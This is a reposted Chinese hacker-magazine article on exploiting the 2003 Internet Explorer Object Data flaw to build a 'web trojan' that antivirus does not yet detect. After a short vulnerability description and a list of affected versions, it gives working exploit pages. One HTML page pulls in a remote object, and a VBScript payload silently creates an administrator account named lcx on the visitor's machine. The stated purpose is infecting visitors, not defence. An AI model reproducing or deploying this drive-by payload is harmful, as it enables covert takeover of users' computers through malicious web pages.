利用IE Object Data漏洞制做全新網(wǎng)頁木馬(圖)
原發(fā)黑客x檔案第8期,版權歸雜志所有.
利用Internet Explorer Object Data漏洞制做全新網(wǎng)頁木馬
lcx
今年8月20日,微軟公布了一個最高嚴重等級的重要漏洞--Internet Explorer Object數(shù)據(jù)遠程執(zhí)行漏洞。這對于網(wǎng)頁木馬愛好者來說可是一件好事,我們可以用這個漏洞來制做一款全新的暫時不會被查殺的木馬了。在介紹如何制做這個全新網(wǎng)頁木馬前我先給大家簡單介紹一下該漏洞。
一、漏洞描述
該漏洞內(nèi)由eEye Digital Security發(fā)現(xiàn)并于8月20號公布的,微軟同一天也發(fā)布了相應的公告。在eEye的網(wǎng)站公布頁面:http://www.eeye.com/html/Research/Advisories/AD20030820.html這個文檔中提到,Microsoft Internet Explorer是一款流行的WEB瀏覽程序,Internet Explorer在處理對象"Object"標記時沒有正確處理要被裝載的文件參數(shù)。
"Object"標記用于插入ActiveX組件等對象到HTML頁面。"Object"標記的"Type"屬性用于設置或獲取對象的MIME類型。通常合法MIME類型包括"plain/text"或"application/hta", "audio/x-mpeg"等。Internet Explorer指定遠程對象數(shù)據(jù)位置的參數(shù)沒有充分檢查被裝載的文件屬性,攻擊者可以構建惡意頁面,誘使用戶訪問來運行惡意頁面指定的程序 。Windows 2003 Internet Explorer由于使用了"Enhanced Security Configuration Mode"模式,默認是使用 了"Disable ActiveX",因此此漏洞在Windows 2003 IE級別為中等。
這段描述很專業(yè),不過看不懂的菜鳥可以跳過,直接學制做方法。:-)
二、受影響的系統(tǒng)版本
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.5SP2
Microsoft Internet Explorer 5.5SP1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.0.1SP3
Microsoft Internet Explorer 5.0.1SP2
Microsoft Internet Explorer 5.0.1SP1
Microsoft Internet Explorer 6.0SP1
- Microsoft Windows XP
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2003 Web Edition
- Microsoft Windows 2003 Standard Edition
- Microsoft Windows 2003 Enterprise Edition 64-bit
- Microsoft Windows 2003 Enterprise Edition
- Microsoft Windows 2003 Datacenter Edition 64-bit
- Microsoft Windows 2003 Datacenter Edition
- Microsoft Windows 2000
三、漏洞利用詳細方法
根據(jù)http://www.eeye.com/html/Research/Advisories/AD20030820.html這個頁面的提示,我寫出了兩個簡單的測試頁面。請先看代碼和注釋,我再來講解一下。
--------------test.htm代碼開始-----------------
<html>
<body>
這是個測試頁,如果你的系統(tǒng)是w2k或xp,訪問后將會增加一個用戶名是lcx密碼是lcxlcx的管理用戶
<object data="http://127.0.0.1/test.test"></object>
<!--這就是來調(diào)用一個惡意頁面了test.test,我是在本機測試的,放在我的iis管理器根目錄下,所以url是http://127.0.0.1;如果你要用這段代碼,請更改相應的網(wǎng)test.test的url地址,將http://127.0.0.1/test.test改成http://你的url/test.test--!>
</body>
------------test.htm代碼結束--------------
--------------test.htm中寫到的test.test代碼開始------------------
<html>
<object id=wsh classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B></object>
<script language=vbscript>
set wshshell=createobject ("wscript.shell" )
a=wshshell.run ("cmd.exe /c net user lcx lcxlcx /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators lcx /add",0)
'這是加一個用戶是lcx密碼是lcxlcx的管理用戶,這段vbs你應當會看懂
</script>
</html>
------------test.test代碼結束---------------
相關文章
Sql Injection in DB2數(shù)據(jù)庫
Sql Injection in DB2數(shù)據(jù)庫...2007-01-01